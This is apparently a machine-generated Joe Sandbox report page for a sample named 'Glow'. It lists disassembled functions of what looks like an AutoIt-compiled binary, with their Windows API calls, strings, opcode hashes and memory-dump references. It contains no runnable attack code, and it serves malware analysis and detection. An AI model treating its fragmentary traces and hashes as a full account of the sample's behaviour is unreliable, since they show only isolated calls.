Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0c9dd55a0949441c4ddad060789dc821dd241d21b28e17b736f35dda1897f621
Instruction ID: 89e5245708d92540e2fe4583f993b386afcf6e8f681ad2717a87aba7257c9c9a
Opcode Fuzzy Hash: 0c9dd55a0949441c4ddad060789dc821dd241d21b28e17b736f35dda1897f621
Instruction Fuzzy Hash: 9F91C672E002169ADB228E64CC51FEEBBB9DF0B310F19466DE905E7142E735DD40EBA0

Function 00404F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004050A5
VariantInit.OLEAUT32(?), ref: 004051A6
VariantClear.OLEAUT32(?), ref: 004051B0
VariantClear.OLEAUT32(?), ref: 0040520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00405035, 00405163, 0040521B
Incorrect Object type in FOR..IN loop, xrefs: 00405189

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 7eee21ef9929ba35902e5c98f34de4c9ed27c23f6a7dbb7ab972621ab3938a13
Instruction ID: acb36875ce5f1e9d1f97976ae7d0608df5fa68cae821644d106de2c206ed21cf
Opcode Fuzzy Hash: 7eee21ef9929ba35902e5c98f34de4c9ed27c23f6a7dbb7ab972621ab3938a13
Instruction Fuzzy Hash: D8919E70E00619ABDF20CFA4D884FAFBBB8EF45314F10856AF505AB280D7749941CFA8

Function 004043A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004043C8
CharUpperBuffW.USER32(?,?), ref: 004044D7
_wcslen.LIBCMT ref: 004044E7
VariantClear.OLEAUT32(?), ref: 0040467C

Part of subcall function 003F169E: VariantInit.OLEAUT32(00000000), ref: 003F16DE
Part of subcall function 003F169E: VariantCopy.OLEAUT32(?,?), ref: 003F16E7
Part of subcall function 003F169E: VariantClear.OLEAUT32(?), ref: 003F16F3

Strings

AUTOIT.ERROR, xrefs: 004044DD, 004044E2
Incorrect Parameter format, xrefs: 00404403, 004045FE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 0db37765dc9e2abaf7137417b3a19e05e3c5a2b1e4f121cbd1f4fe3020327071
Instruction ID: 2428ce4bd9fcedf43a0fa5d66c69e3b900d61eb1b1d8a0dbee53d8a4192e7d43
Opcode Fuzzy Hash: 0db37765dc9e2abaf7137417b3a19e05e3c5a2b1e4f121cbd1f4fe3020327071
Instruction Fuzzy Hash: A4917CB4A04301AFC704EF24C48096AB7E5FF89714F14896EF9899B391DB35ED06CB96

Function 0040560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 003E08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?,?,003E0C4E), ref: 003E091B
Part of subcall function 003E08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0936
Part of subcall function 003E08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0944
Part of subcall function 003E08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?), ref: 003E0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004056AE
_wcslen.LIBCMT ref: 004057B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0040582C
CoTaskMemFree.OLE32(?), ref: 00405837

Strings

NULL Pointer assignment, xrefs: 00405880, 004058AF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: ac9adc6b0c469da0c216cb0d68617f362948b06b67c248aeed3ed7337f101322
Instruction ID: 7c191713616499a82ffc7b75b3ceb3a860e2f1573f223f6cf822e10e2cebf3fe
Opcode Fuzzy Hash: ac9adc6b0c469da0c216cb0d68617f362948b06b67c248aeed3ed7337f101322
Instruction Fuzzy Hash: DE910771D00219EFDF11EFA4D880AEEB7B9EF08304F10856AE915BB291DB749A45CF64

Function 00412B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00412C1F
GetMenuItemCount.USER32(00000000), ref: 00412C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00412C79
_wcslen.LIBCMT ref: 00412CAF
GetMenuItemID.USER32(?,?), ref: 00412CE9
GetSubMenu.USER32(?,?), ref: 00412CF7

Part of subcall function 003E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E43AD
Part of subcall function 003E4393: GetCurrentThreadId.KERNEL32 ref: 003E43B4
Part of subcall function 003E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E2F00), ref: 003E43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00412D7F

Part of subcall function 003EF292: Sleep.KERNEL32 ref: 003EF30A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 2fb0c54663635658623487d50a4f4b4d8626fd5e8fa514f538b390d6254cc7fa
Instruction ID: 83d32dd9498ad0f2619df9d82114f5369bf1163c130544d6151ec319f0596de9
Opcode Fuzzy Hash: 2fb0c54663635658623487d50a4f4b4d8626fd5e8fa514f538b390d6254cc7fa
Instruction Fuzzy Hash: 9671AE75E00215AFCB01EF64D941AEEB7F1EF48310F10846AE916EB351DB78EE818B94

Function 003EB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 003EB8C0
GetKeyboardState.USER32(?), ref: 003EB8D5
SetKeyboardState.USER32(?), ref: 003EB936
PostMessageW.USER32(?,00000101,00000010,?), ref: 003EB964
PostMessageW.USER32(?,00000101,00000011,?), ref: 003EB983
PostMessageW.USER32(?,00000101,00000012,?), ref: 003EB9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 003EB9E7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b14facfa514069288722cd62d5afdba0424ded517998dda06ef52ecb7da12a4b
Instruction ID: feec8845e99b5aa5a967f1f92814d67bc255b62302e5c4810bd3667780cb3a0a
Opcode Fuzzy Hash: b14facfa514069288722cd62d5afdba0424ded517998dda06ef52ecb7da12a4b
Instruction Fuzzy Hash: D651D1A09087E53EFB3742368855BBBFEA95B06304F098699F1D5568D3C3E8ACC4D750

Function 003EB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 003EB6E0
GetKeyboardState.USER32(?), ref: 003EB6F5
SetKeyboardState.USER32(?), ref: 003EB756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003EB782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003EB79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003EB7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003EB7FF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6403f389fbc17fc97a629ea7384f3ef0860e2d12b7305afc80d54d0073548522
Instruction ID: 29bde3ff9357abd52eb8921a7c22ed623afb855560cce14dbbd2a014056fe7a6
Opcode Fuzzy Hash: 6403f389fbc17fc97a629ea7384f3ef0860e2d12b7305afc80d54d0073548522
Instruction Fuzzy Hash: 555102A09087F53EFB3783268C15BB7FEA85F46304F098689E0D85A8D2D394EC94D750

Function 003B57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,003B5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 003B57E3
__fassign.LIBCMT ref: 003B585E
__fassign.LIBCMT ref: 003B5879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 003B589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,003B5F16,00000000,?,?,?,?,?,?,?,?,?,003B5F16,?), ref: 003B58BE
WriteFile.KERNEL32(?,?,00000001,003B5F16,00000000,?,?,?,?,?,?,?,?,?,003B5F16,?), ref: 003B58F7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 31b37c0b2b9296ac20773633490508f6c3839520f85cb34fe1686cd9381ebf40
Instruction ID: ad814b569fcac200bfa5771c423c39ed4603d77cb8680d773bc29f0724c4e7d8
Opcode Fuzzy Hash: 31b37c0b2b9296ac20773633490508f6c3839520f85cb34fe1686cd9381ebf40
Instruction Fuzzy Hash: 0951C371A00649DFCB11CFA8D881BEEBBF8EF09315F14412AEA55E7291D730DA41CB65

Function 003A3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 003A30BB
___except_validate_context_record.LIBVCRUNTIME ref: 003A30C3
_ValidateLocalCookies.LIBCMT ref: 003A3151
__IsNonwritableInCurrentImage.LIBCMT ref: 003A317C
_ValidateLocalCookies.LIBCMT ref: 003A31D1

Strings

csm, xrefs: 003A3166

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b2c19b8642de096fae999495285c8a2ec8cc1c77de5d007d5af790165d70372b
Instruction ID: e2253320069a92bd91ae7720cfbe0122a333219ea9dd5cc691aeb6837af64142
Opcode Fuzzy Hash: b2c19b8642de096fae999495285c8a2ec8cc1c77de5d007d5af790165d70372b
Instruction Fuzzy Hash: 05419234E00218ABCF12EF68CC85A9EBBB5EF46324F148165F815AB392D735DB05CB91

Function 00401B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00403AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00403AD7
Part of subcall function 00403AAB: _wcslen.LIBCMT ref: 00403AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00401B6F
WSAGetLastError.WSOCK32 ref: 00401B7E
WSAGetLastError.WSOCK32 ref: 00401C26
closesocket.WSOCK32(00000000), ref: 00401C56

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 0d30c5987d0c5dbd1078fc7ba206c33dda29dcf5831344d8fb767dca27082e09
Instruction ID: 8a0f800dc32fe7a4976ce59f84a8c610e0b0f5900916d708864bc7a7b021b9c6
Opcode Fuzzy Hash: 0d30c5987d0c5dbd1078fc7ba206c33dda29dcf5831344d8fb767dca27082e09
Instruction Fuzzy Hash: 4541D771600214AFDB10AF64C844BAAB7E9EF45314F14806AF815AB2D2D778ED41CBE5

Function 003ED7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003ED7CD,?), ref: 003EE714

Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003ED7CD,?), ref: 003EE72D

lstrcmpiW.KERNEL32(?,?), ref: 003ED7F0
MoveFileW.KERNEL32(?,?), ref: 003ED82A
_wcslen.LIBCMT ref: 003ED8B0
_wcslen.LIBCMT ref: 003ED8C6
SHFileOperationW.SHELL32(?), ref: 003ED90C

Strings

\*.*, xrefs: 003ED89E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 3ddd4661a4f1904b808ed933816ac4cbe9e55c3a4ebfd74147aff6b65de8603c
Instruction ID: 33f3a4308283bb8670a79ac0d54689efd6f35aa6ff0b42ffc60faf6408c94d05
Opcode Fuzzy Hash: 3ddd4661a4f1904b808ed933816ac4cbe9e55c3a4ebfd74147aff6b65de8603c
Instruction Fuzzy Hash: 44416771D052689EDF13EFA5C985BDE77B8AF08340F1105EAA509EF181EB35A788CB50

Function 003F42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 003F4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 003F4367
TranslateMessage.USER32(?), ref: 003F4390
DispatchMessageW.USER32(?), ref: 003F439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F43AB

Strings

(E, xrefs: 003F437D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (E
API String ID: 2256411358-3218771753
Opcode ID: 74f4af3d2e445156026e493e0ac152a94c040e1b759074a43d7be58dd030d3d1
Instruction ID: 8a419f1887f97972125dd49e2cfd4a2ccb89ff67b46212613cdc05069cd75b91
Opcode Fuzzy Hash: 74f4af3d2e445156026e493e0ac152a94c040e1b759074a43d7be58dd030d3d1
Instruction Fuzzy Hash: E3311874A0434AEFEB36CB34D948BB73BA8AB01305F05453BD662C21A1E3B4E555CF25

Function 00413899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004138B8
GetWindowLongW.USER32(?,000000F0), ref: 004138EB
GetWindowLongW.USER32(?,000000F0), ref: 00413920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00413952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0041397C
GetWindowLongW.USER32(?,000000F0), ref: 0041398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004139A7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ead4df335917e5cd61e269d18b8269eea8af361da31d218f05cb2ebd691a9657
Instruction ID: 72ffc98168aa7f4206393f58fec15ee04d1f49e061a01c9468f40c8f57bfd02a
Opcode Fuzzy Hash: ead4df335917e5cd61e269d18b8269eea8af361da31d218f05cb2ebd691a9657
Instruction Fuzzy Hash: 203157B0704251AFDB21CF58DC84FA537E4FB86712F1401A6F5148B3B2CBB8A985CB49

Function 003E808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E80F6
SysAllocString.OLEAUT32(00000000), ref: 003E80F9
SysAllocString.OLEAUT32(?), ref: 003E8117
SysFreeString.OLEAUT32(?), ref: 003E8120
StringFromGUID2.OLE32(?,?,00000028), ref: 003E8145
SysAllocString.OLEAUT32(?), ref: 003E8153

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 19e0291393c9394d816e7b259b96f1cc42dadb95c2c04f8fbab5d8ef6021125a
Instruction ID: fde9f31680a5d7aba53cc73ff60e5a46cfb1b9fa762ea73a841708be86de13a6
Opcode Fuzzy Hash: 19e0291393c9394d816e7b259b96f1cc42dadb95c2c04f8fbab5d8ef6021125a
Instruction Fuzzy Hash: 3321B576A00229BF9F11DFA9CC84CFA73ACEB093647008525F909DB290DA74DC468B64

Function 003E8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E81CF
SysAllocString.OLEAUT32(00000000), ref: 003E81D2
SysAllocString.OLEAUT32 ref: 003E81F3
SysFreeString.OLEAUT32 ref: 003E81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 003E8216
SysAllocString.OLEAUT32(?), ref: 003E8224

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 87677df1c04b00f7472e64430672a25e94bc9157f5eabd232f2aa2e4d32ef8c8
Instruction ID: cf43172a0a35dd1513580cce5afab722eac85a53b028c5ba32a995efb3c886c6
Opcode Fuzzy Hash: 87677df1c04b00f7472e64430672a25e94bc9157f5eabd232f2aa2e4d32ef8c8
Instruction Fuzzy Hash: F3217475A00158BF9B119BA9DC89DAA77ECEB093607058625FA09CB1E0DA74EC41CB64

Function 003F0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 003F0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F0ED5

Strings

nul, xrefs: 003F0F0E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 66fb1ba693f4162bcbda3d5a08ee77aa2e331ce9216c04f01f6367851bf6a6d0
Instruction ID: 817c9dd280454cb24b7767e07b87a9d496ab1044d28ed9a6877b30b5beaeb0dd
Opcode Fuzzy Hash: 66fb1ba693f4162bcbda3d5a08ee77aa2e331ce9216c04f01f6367851bf6a6d0
Instruction Fuzzy Hash: D0217C7450430EABDB358F28DC04EAA7BB8BF54720F204A69FEA5E72D1D770A940CB50

Function 003F0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 003F0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F0FA8

Strings

nul, xrefs: 003F0FE0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

